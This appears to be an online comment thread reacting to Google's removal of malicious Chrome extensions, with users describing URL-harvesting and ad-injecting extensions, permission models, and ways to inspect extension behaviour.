The Quick Note Chrome extension from Diigo (now removed) submits every URL visited to a third-party server and those URLs are then crawled the next day.
We just switched our 25 member customer service team to Chromeboxes and were very concerned to find soon after that an EC2-based crawler was querying private URLs of our platform.
Because the Chrome Web Store had not banned bad actors like Diigo, we now blacklisted all Chrome extensions except for a very small number that I personally approve. Rather than feeling that ChromeOS was improving our security, we had our chief software architect spend most of the weekend figuring out who was targeting our platform. (All queries received 404 errors, but we remained concerned whether the rogue extension could read the submitted form credentials or the cookie store to get access.)
Rogue extensions are wasting a huge amount of time and destroying trust in the Chrome platform. Here's some more detail on similar stories about Diigo:
https://chrisa.wordpress.com/2014/08/25/chrome-extensions-go... https://mig5.net/content/awesome-screenshot-and-niki-bot
I am thrilled to see Google finally acting to restore trust in their platform.
Update: Google removed Diigo Quick Note, but still has Awesome Screenshot <https://chrome.google.com/webstore/search/diigo?hl=en-US> which captures the identical data and sells it to third party crawlers.
It appears to log what actions each application and extension performs, view permissions, and debug the extensions' background pages
I think one of the worst things to me is the number of drive-by installers that now target chrome, firefox and ie with malware extensions, or transparent proxies. I saw one on a friend's son's computure and mainly noticed because there were additional ads on Amazon's site. Sometimes I think we should bring back outlaw (dead or alive) status for certain classes of criminal dredge on society... Then I think about where the likes of Snowden would fall from the governments perspective and think it over again.
I don't think their URL scanners are clever enough to dig through emails and try user/pass combos
The answer is for google to own what is in their store, but that costs money.
Which is usually accompanied by the developer apologising and explaining they have to declare this in order to provide the extension's core functionality. Users then learn to ignore these warnings, malicious extensions ensue.
I'm glad Google is taking malicious extensions seriously, but purging is a difficult semi-manual effort when extensions can update any time. A lot more effective would be to bake security into the whole model. Extensions shouldn't need to see your entire browsing history on all sites just to enhance some links or do syntax highlighting.
It should also be possible to request permissions on demand, and for certain URLs, instead of blanket-consenting before the extension is even installed. I know these things are a trade-off with simplicity, but should at least be there for orgs and individuals who want to take advantage of them.
Chrome extensions can request only access to specific URL regex's, so they can be fine-grained about location, but the actual permissions tend to be coarse-grained. And as a user, you can't change the URL regex (that's some low-hanging fruit right there - users should be able to edit the URL pattern for any extension).
In some respects, Chrome apps are morphing to be general websites (e.g. with manifest.json and installing to home screen on Android), so hopefully things will move more in the direction of the web. There were also some hints towards on-demand permissions in the security talk at the most recent Chrome Web Summit, I'm not sure it's proceeding.
1. The user logs in to his/her online banking website.
2. The malware gets triggered and phones home with user's credentials.
3. The bad guy logs in using user's credentials in own computer.
4. The bad guy initiates bank transfer from user's account to his account.
4. The bad guy is presented with "enter auth code" to confirm the transaction.
5. The malware pops up "Verify your auth code" into user's computer.
6. Thinking "it must be new method from my bank", user types his/her auth code.
7. The auth code gets sent to the bad guy, allowing him to complete transaction.
8. Profit.
AdBlock is very clear in what it does and users install it because they want to block ads, whereas users are usually not aware when an extension injects ads. As a note, the Awesome Screenshot extension for Firefox asks you if you want ads injected, probably because of Mozilla's review process, whereas the Chrome version does not.
It's one thing for websites to be ripped of the opportunity to make money from your eyeballs, with your consent, it's quite another for those same websites to generate money unknowingly for an obscure third-party. We are probably talking about copyright infringement done for commercial for-profit reasons.
Google is annoying me lately. I now use Firefox on my Android and I do that because AdBlock Plus and uBlock are working on it, whereas Chrome for Android still doesn't have plugins, probably because they don't want ad blockers in it.
"I spoke to the team that maintains that list and they don't have plans to make it public, if you would be willing to share some ideas on how to better protect people from this unwanted software I would be happy to pass it on but due to the nature of the work (trying to stay one step ahead of bad guys) we probably won't be able to share anything back."
I'm the author of this anti-adware addon called "Extension Defender" and it would greatly help my users if I could use their list, because while they extensions were removed from the Webstore, does that mean it was forcibly removed from their PC? Probably not.
Plug: https://chrome.google.com/webstore/detail/extension-defender...
Interestingly enough, Vosteran also produces a rogue fork of Chrome which makes Vosteran's own search/ad platform built-in and unavoidable. Said rogue fork is also installed without users' permission.
https://chrome.google.com/webstore/detail/vosteran-new-tab/o...
I invite you to peruse the first five pages of search results here and make your own assumptions about the legitimacy of all it's five star ratings: https://www.google.com/?gws_rd=ssl#q=vosteran
I just can't talk myself into the "This extension will have access to your browsing history and private data on all websites" warning that appears beforehand, and it looks like with extensions sending private URLs away to be crawled, I was at least a little correct to worry.
How might they have detected what extensions are installed in their visitor's browsers?
Is there a way to enumerate installed extensions?
http://browserspy.dk/ and https://panopticlick.eff.org/ detect plugins, but those aren't the same as extensions.
I forget the name but I had one that allowed for a custom new tab page. It had opt-out ads, but I otherwise loved it. It kept getting disabled after each fresh start of Chrome. Debated forking it but haven't yet.
It might matter that I do have my extensions sync between machines. Extension is eventually disabled on the others as well.
EDIT: "This extension violates the Chrome Web Store policy." The extension is Modern New Tab Page. The store page is gone, so no clue what policies are violated, what I need to fear, etcetera.
I can still enable it, but it will be disabled at some point.
Does it have questionable practices? Yes. There's a settings option but it's different than the settings I see by going to chrome://extensions/ as the sole option on the latter is to disable ads.
EDIT 2: To be clear, this extension was blocked late last year, and is not part of this recent batch. At that time there were questions about whether there was a list as well. There was, like this time, no notification to impacted users.
As an aside, I'm surprised at how willing most users seem to be to install any software, be it browser extensions or random apps on their phones/tablets/PCs. Especially in the case of deliberately malicious extensions mentioned in the article, I wonder if they were installed without the user ever considering "What is this for? Do I really need it?"
How? One of the biggest offenders are extensions whose expected behavior is to send large amounts of data to a remote server to be used on your behalf, but where they actually then use the information for other purposes, sell it to others, etc.
Examining the client side JS will never tell you what the back end is doing with the data, only what data is transferred, and so won't identify this kind of nefarious behavior at all.
What infuriates me is that even extensions that are widely known to have succumbed to these sinister offers to include borderline malware in their extension, such as Hover Zoom, are not punished in the slightest even after being caught, or even required to remove the malicious javascript snippet.
What the hell is the point of all these XSS prevention measures in modern browsers, such as reflected XSS prevention, CSP, script nonces, etc. when all you have to do to bypass all of them is make your own browser extension? Is the team at Google that handles Chrome extensions completely unable to communicate with the team that handles browser security? The left hand has forgotten that the right hand even exists. I nominate Google as the company that the movie The Cube was warning us about.
If the suspiciously nameless author of this article wasn't paid by Google to write it, then he ripped himself off. If the author had performed the most basic research into the topic he was writing about, he would have learned that Firefox's approach to extensions is perfect and is the only reasonable solution to the security problems that exist with Chrome's extensions. An actual journalist writing about this topic would have swiftly concluded that Google should be lambasted for its blunders and mocked for not living up to Firefox's standards, rather than being borderline worshipped for barely doing anything to fix a horrific problem they openly invited in the first place.
Enjoy your walled garden. Soon enough the walls will be so high you wont even remember what a free browser felt like.
Not on Chrome stable. You have to use beta, dev, or a Chromium build for that.
That being said, your walled garden notion is accurate. Chrome used "security" as an excuse to lock down the extensions platform to only their Web Store. But it's not any more secure, since there's plenty of malware in the Web Store. It was just an excuse to wall in their product.
http://extensiondefender.com/blog/red-alert-dangerous-exploi...
Browser extensions offer a whole new host of evils, along with a marginally effective way to fight back against the rising tsunami of web horrors. The web is mostly about harming users, so I can hardly blame them for grasping at whatever chance they have to defend themselves.
Browsers are for interactive documents, for everything else there are native applications, even though I also do web development gigs.
You'd then have to go to a screen on your computer with that particular transaction, find it, and enter the code. You don't suddenly get some kind of authentication pop up, and know to enter a particular code that authorises anything that isn't your password. That's the whole point of 2FA?
Beyond that, it's surprising that bank fraud still happens seeing as in most countries there are very strict KYC/AML requirements, meaning you can only open a bank acc with an ID in person, with a registered address. I got hit by this myself a while ago when I sent some money for an online purchase that never delivered. I was really bummed out, got scammed but thought at least I had an acc number with a name and address. I looked into it more and it turns out there's a big network of low-end criminals who will approach some 16 year old on his way home from High School. He'll have $50 on his account. Is given $100 straight up, and promised $200 additionally later on, in exchange for his debit card. Youth thinks 'why the hell not, got $50 to lose, just gained $100 and potentially more'. The criminal will use that bank acc to collect money, retrieves it from an ATM with the card, then disappears. Police investigation into the scam will turn up with a 16 year old unaware of the risk of 'identity theft' (weird semi-bs concept itself) who lent out his card and didn't understand the consequences. The criminal goes free without a trace.
Extensions are Apps.
Without a meaningfully robust (and mandatory) security model and some basic security audits to prevent over-reaching security defaults/requests, you might as well be running Windows XP.
Ghostery has a bit of a different model, but they're no saints: http://www.technologyreview.com/news/516156/a-popular-ad-blo...
I guess the lure of selling use data is just too great for any commercial entity to control the source of these as blockers. uBlock and PrivacyBadger are still clean AFAIK.
I use a couple of them at once, block most JavaScript, usually run with cookies disabled, and pay a bit of attention to what's going on in the privacy news. For less tech-savvy relatives, I just install Ghostery and disable third-party cookies, since that seems least likely to break websites, and blocks most of the worst tracking.
Oh, and hosts-block tynt. Those guys should drown in burning kerosene.
Minified and obfuscated Javascript is not much easier to check than binary files and more difficult than e.g Java class files, at least without ProGuard.
Instead it is far more likely for the extension to make the requests from their background page (which has elevated permissions) which is essentially its own page with its own inspector. You can inspect each extension individually by going to your extension listing, enabling developer mode and inspecting the background page of the extension you suspect.
EDIT: here's how to inspect extensions you're curious about: https://developer.chrome.com/extensions/tut_debugging
For all the things I didn't/don't care for regarding flash and silverlight, having a single compressed downloadable package is a nicety. I think Silverlight did a better job of it though. When Adobe bought Macromedia, my sincere hope was that they'd turn flash into a more open format that was an archive manifest with svg, mp3 and other assets with closer to plain JavaScript for their part. That could have been something browsers would be more likely to have embraced.
Websites are different probably because it wasn't Google who designed their model, thankfully.
Okay, so it's malware. Let's check out their webpage[2]! Hm, they give a physical address at 28 Lilienbulm St. in Tel Aviv... as an image, to avoid search engines. Let's look at their "how-to-get-rid-of-this-crap-I-don't-want" process[3], which "shouldn't take more than 10 minutes": so they basically put their tentacles into any crevice they can find, and make it annoying to pry them out.
Let's see if it's easy to see who runs this bit of evil... nope. They're amoral scum.
[1] https://en.wikipedia.org/wiki/Browser_hijacking#Vosteran
Not sure if any of that still works with GVoice, but if not, I'd look into doing it with Twilio possibly.
And it can sure handle js uglify, etc there are tools and systems that allow you to remove more than that and then it becomes really difficult to get a handle on WTF is going on.